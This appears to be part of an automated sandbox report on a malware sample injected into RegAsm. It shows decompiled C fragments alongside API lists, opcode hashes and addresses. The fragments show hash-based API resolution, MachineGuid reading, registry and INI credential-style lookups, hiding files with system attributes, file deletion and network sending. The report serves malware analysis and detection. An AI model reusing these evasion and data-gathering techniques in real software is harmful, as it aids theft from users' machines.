                                                                                          0x00404abc
                                                                                          0x00404ac1
                                                                                          0x00404ac6
                                                                                          0x00404ac6
                                                                                          0x00404a9e
                                                                                          0x00404ad9

                                                                                          APIs
                                                                                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                          • RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocateOpenProcessQueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 1425999871-0
                                                                                          • Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                                                                          • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                                                          • Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                                                                          • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 40%
                                                                                          			E004060BD(void* __eflags) {
                                                                                          				signed int _v8;
                                                                                          				char _v12;
                                                                                          				short _v16;
                                                                                          				char _v20;
                                                                                          				void* __ebx;
                                                                                          				intOrPtr* _t12;
                                                                                          				signed int _t13;
                                                                                          				intOrPtr* _t14;
                                                                                          				signed int _t15;
                                                                                          				void* _t24;
                                                                                          
                                                                                          				_v16 = 0x500;
                                                                                          				_v20 = 0;
                                                                                          				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                                                                                          				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                                                                          				_v8 = _t13;
                                                                                          				if(_t13 != 0) {
                                                                                          					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                                                                                          					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                                                                                          					asm("sbb eax, eax");
                                                                                          					_v8 = _v8 &  ~_t15;
                                                                                          					E0040604F(_v12);
                                                                                          					return _v8;
                                                                                          				}
                                                                                          				return _t13;
                                                                                          			}













                                                                                          0x004060c6
                                                                                          0x004060d5
                                                                                          0x004060d8
                                                                                          0x004060f4
                                                                                          0x004060f6
                                                                                          0x004060fb
                                                                                          0x0040610a
                                                                                          0x00406115
                                                                                          0x0040611c
                                                                                          0x0040611e
                                                                                          0x00406121
                                                                                          0x00000000
                                                                                          0x0040612a
                                                                                          0x0040612f

                                                                                          APIs
                                                                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CheckMembershipToken
                                                                                          • String ID:
                                                                                          • API String ID: 1351025785-0
                                                                                          • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                                                          • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                                                                          • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                                                                          • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 75%
                                                                                          			E00404056(void* __ebx, intOrPtr _a4) {
                                                                                          				intOrPtr* _t5;
                                                                                          				void* _t6;
                                                                                          				void* _t14;
                                                                                          
                                                                                          				_t14 = E00402B7C(0x208);
                                                                                          				if(_t14 == 0) {
                                                                                          					L4:
                                                                                          					return 0;
                                                                                          				}
                                                                                          				E00402B4E(_t14, 0, 0x208);
                                                                                          				_t5 = E004031E5(__ebx, 0xa, 0xc7f71852, 0, 0);
                                                                                          				_t6 =  *_t5(0, _a4, 0, 0, _t14); // executed
                                                                                          				if(_t6 != 0) {
                                                                                          					E00402BAB(_t14);
                                                                                          					goto L4;
                                                                                          				}
                                                                                          				return _t14;
                                                                                          			}






                                                                                          0x00404066
                                                                                          0x0040406b
                                                                                          0x004040a0
                                                                                          0x00000000
                                                                                          0x004040a0
                                                                                          0x00404072
                                                                                          0x00404083
                                                                                          0x0040408f
                                                                                          0x00404093
                                                                                          0x0040409a
                                                                                          0x00000000
                                                                                          0x0040409f
                                                                                          0x00000000

                                                                                          APIs
                                                                                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                          • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,0000000A,C7F71852,00000000,00000000,00413CAD,0000001A,00000001), ref: 0040408F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocateFolderPathProcess
                                                                                          • String ID:
                                                                                          • API String ID: 398210565-0
                                                                                          • Opcode ID: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
                                                                                          • Instruction ID: 7d0b33caadbb1370849e9dfd1ecad86b360ac2e9a1dca59c17201c727c4e1007
                                                                                          • Opcode Fuzzy Hash: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
                                                                                          • Instruction Fuzzy Hash: 57E06D6260156136D23129A7AC09D6B6E7DCBD3FA5B00003FF708F52C1D96D990281BA
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                                                                                          				void* _t3;
                                                                                          				int _t5;
                                                                                          
                                                                                          				_t3 = E00403D4D(__eflags, _a4); // executed
                                                                                          				if(_t3 == 0) {
                                                                                          					__eflags = 0;
                                                                                          					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                                                                                          					_t5 = CreateDirectoryW(_a4, 0); // executed
                                                                                          					return _t5;
                                                                                          				} else {
                                                                                          					return 1;
                                                                                          				}
                                                                                          			}





                                                                                          0x00403c68
                                                                                          0x00403c70
                                                                                          0x00403c78
                                                                                          0x00403c82
                                                                                          0x00403c8b
                                                                                          0x00403c8f
                                                                                          0x00403c72
                                                                                          0x00403c76
                                                                                          0x00403c76

                                                                                          APIs
                                                                                          • CreateDirectoryW.KERNEL32(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateDirectory
                                                                                          • String ID:
                                                                                          • API String ID: 4241100979-0
                                                                                          • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                                                          • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                                                                          • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                                                                          • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 37%
                                                                                          			E0040642C(void* __eflags) {
                                                                                          				short _v40;
                                                                                          				intOrPtr* _t6;
                                                                                          				void* _t10;
                                                                                          
                                                                                          				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                                                                                          				 *_t6( &_v40); // executed
                                                                                          				return 0 | _v40 == 0x00000009;
                                                                                          			}






                                                                                          0x0040643c
                                                                                          0x00406445
                                                                                          0x00406454

                                                                                          APIs
                                                                                          • GetNativeSystemInfo.KERNEL32(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoNativeSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1721193555-0
                                                                                          • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                                                          • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                                                                          • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                                                                          • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E004044A7(WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
                                                                                          				long _t9;
                                                                                          				void* _t10;
                                                                                          
                                                                                          				E004031E5(_t10, 0, 0xf66be5a2, 0, 0);
                                                                                          				_t9 = GetPrivateProfileStringW(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                                                          				return _t9;
                                                                                          			}





                                                                                          0x004044b4
                                                                                          0x004044cb
                                                                                          0x004044ce

                                                                                          APIs
                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PrivateProfileString
                                                                                          • String ID:
                                                                                          • API String ID: 1096422788-0
                                                                                          • Opcode ID: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
                                                                                          • Instruction ID: e6a1e737d40be81796f932fb1ea6dd5b05bd2579ff383e5fb5a00b3a8c54de51
                                                                                          • Opcode Fuzzy Hash: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
                                                                                          • Instruction Fuzzy Hash: 52D0C27604410DBFDF025EE1DC05CAB3F6EEB48354B408425BE2895021D637DA71ABA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E004049B3(void* _a4, WCHAR* _a8, WCHAR* _a12, DWORD* _a16, void* _a20, DWORD* _a24) {
                                                                                          				int _t8;
                                                                                          				void* _t9;
                                                                                          
                                                                                          				E004031E5(_t9, 2, 0xdc1011d7, 0, 0);
                                                                                          				_t8 = SHGetValueW(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                                                          				return _t8;
                                                                                          			}





                                                                                          0x004049c1
                                                                                          0x004049d8
                                                                                          0x004049db

                                                                                          APIs
                                                                                          • SHGetValueW.SHLWAPI(?,?,?,?,?,?,00000002,DC1011D7,00000000,00000000), ref: 004049D8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Value
                                                                                          • String ID:
                                                                                          • API String ID: 3702945584-0
                                                                                          • Opcode ID: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
                                                                                          • Instruction ID: 49132b90e07f175002bb52db16c83daeb6fc20f74050e769a3614ef6a11dfcc0
                                                                                          • Opcode Fuzzy Hash: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
                                                                                          • Instruction Fuzzy Hash: 71D0923214020DBBDF026ED1DC02FAA3F2AAB09758F104014FB18280A1C677D631AB95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 37%
                                                                                          			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                          				intOrPtr _t5;
                                                                                          
                                                                                          				_t5 = _a12;
                                                                                          				if(_t5 == 0) {
                                                                                          					_t5 = E00405D0B(_a8) + 1;
                                                                                          				}
                                                                                          				__imp__#19(_a4, _a8, _t5, 0); // executed
                                                                                          				return _t5;
                                                                                          			}




                                                                                          0x00404eed
                                                                                          0x00404ef2
                                                                                          0x00404efd
                                                                                          0x00404efd
                                                                                          0x00404f07
                                                                                          0x00404f0e

                                                                                          APIs
                                                                                          • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: send
                                                                                          • String ID:
                                                                                          • API String ID: 2809346765-0
                                                                                          • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                                                          • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                                                                          • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                                                                          • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E004049DC(void* _a4, int _a8, WCHAR* _a12, DWORD* _a16) {
                                                                                          				int _t6;
                                                                                          				void* _t7;
                                                                                          
                                                                                          				E004031E5(_t7, 2, 0xeca4834b, 0, 0);
                                                                                          				_t6 = SHEnumKeyExW(_a4, _a8, _a12, _a16); // executed
                                                                                          				return _t6;
                                                                                          			}





                                                                                          0x004049ea
                                                                                          0x004049fb
                                                                                          0x004049fe

                                                                                          APIs
                                                                                          • SHEnumKeyExW.SHLWAPI(?,?,?,?,00000002,ECA4834B,00000000,00000000), ref: 004049FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Enum
                                                                                          • String ID:
                                                                                          • API String ID: 2928410991-0
                                                                                          • Opcode ID: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
                                                                                          • Instruction ID: fb20b8ae34c3d99b6a2ec1f59af3280c7c0bbdac25ffdbb9458fe1f208d0831b
                                                                                          • Opcode Fuzzy Hash: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
                                                                                          • Instruction Fuzzy Hash: 45D0023114430D7BEF115ED1DC06F597F1ABB49B54F104455BB18680E19673A6305755
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                                                                                          				int _t6;
                                                                                          				void* _t7;
                                                                                          
                                                                                          				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                                                                                          				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                                                                                          				return _t6;
                                                                                          			}





                                                                                          0x00403bdd
                                                                                          0x00403beb
                                                                                          0x00403bee

                                                                                          APIs
                                                                                          • MoveFileExW.KERNEL32(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileMove
                                                                                          • String ID:
                                                                                          • API String ID: 3562171763-0
                                                                                          • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                                                          • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                                                                          • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                                                                          • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Startup
                                                                                          • String ID:
                                                                                          • API String ID: 724789610-0
                                                                                          • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                                          • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                                                                          • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                                                                          • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E0040427D(WCHAR* _a4) {
                                                                                          				int _t4;
                                                                                          				void* _t5;
                                                                                          
                                                                                          				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                                                                                          				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                                                                                          				return _t4;
                                                                                          			}





                                                                                          0x0040428a
                                                                                          0x00404297
                                                                                          0x0040429a

                                                                                          APIs
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                                                          • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                                                                          • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                                                                          • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00404A19(void* _a4, short* _a8, void** _a12) {
                                                                                          				long _t5;
                                                                                          				void* _t6;
                                                                                          
                                                                                          				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                                                                                          				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                                                                                          				return _t5;
                                                                                          			}





                                                                                          0x00404a27
                                                                                          0x00404a35
                                                                                          0x00404a38

                                                                                          APIs
                                                                                          • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Open
                                                                                          • String ID:
                                                                                          • API String ID: 71445658-0
                                                                                          • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                                                          • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                                                                          • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                                                          • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00403C08(WCHAR* _a4) {
                                                                                          				int _t4;
                                                                                          				void* _t5;
                                                                                          
                                                                                          				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                                                                                          				_t4 = DeleteFileW(_a4); // executed
                                                                                          				return _t4;
                                                                                          			}





                                                                                          0x00403c15
                                                                                          0x00403c1d
                                                                                          0x00403c20

                                                                                          APIs
                                                                                          • DeleteFileW.KERNEL32(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DeleteFile
                                                                                          • String ID:
                                                                                          • API String ID: 4033686569-0
                                                                                          • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                                                          • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                                                                          • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                                                          • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00402C1F(WCHAR* _a4) {
                                                                                          				struct HINSTANCE__* _t4;
                                                                                          				void* _t5;
                                                                                          
                                                                                          				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                                                                                          				_t4 = LoadLibraryW(_a4); // executed
                                                                                          				return _t4;
                                                                                          			}





                                                                                          0x00402c2c
                                                                                          0x00402c34
                                                                                          0x00402c37

                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                                                          • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                                                          • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                                                          • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00408B2C(struct HINSTANCE__* _a4) {
                                                                                          				int _t4;
                                                                                          				void* _t5;
                                                                                          
                                                                                          				E004031E5(_t5, 0, 0xe0cf5891, 0, 0);
                                                                                          				_t4 = FreeLibrary(_a4); // executed
                                                                                          				return _t4;
                                                                                          			}





                                                                                          0x00408b39
                                                                                          0x00408b41
                                                                                          0x00408b44

                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(?,00000000,E0CF5891,00000000,00000000), ref: 00408B41
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          • Opcode ID: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
                                                                                          • Instruction ID: 291ca984118c00001a410e8fe814b9ebecee15bf7cc635df9db1cfcd8d33b31d
                                                                                          • Opcode Fuzzy Hash: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
                                                                                          • Instruction Fuzzy Hash: 0EB092B004820C3EAE002EF19C05C3B3E8DEA4454870044757E0CE5051EA36DE1110A5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00403BEF(void* _a4) {
                                                                                          				int _t4;
                                                                                          				void* _t5;
                                                                                          
                                                                                          				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                                                                                          				_t4 = FindClose(_a4); // executed
                                                                                          				return _t4;
                                                                                          			}





                                                                                          0x00403bfc
                                                                                          0x00403c04
                                                                                          0x00403c07

                                                                                          APIs
                                                                                          • FindClose.KERNEL32(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseFind
                                                                                          • String ID:
                                                                                          • API String ID: 1863332320-0
                                                                                          • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                                                          • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                                                                          • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                                                          • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 100%
                                                                                          			E00403BB7(WCHAR* _a4) {
                                                                                          				long _t4;
                                                                                          				void* _t5;
                                                                                          
                                                                                          				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                                                                                          				_t4 = GetFileAttributesW(_a4); // executed
                                                                                          				return _t4;
                                                                                          			}





                                                                                          0x00403bc4
                                                                                          0x00403bcc
                                                                                          0x00403bcf

                                                                                          APIs
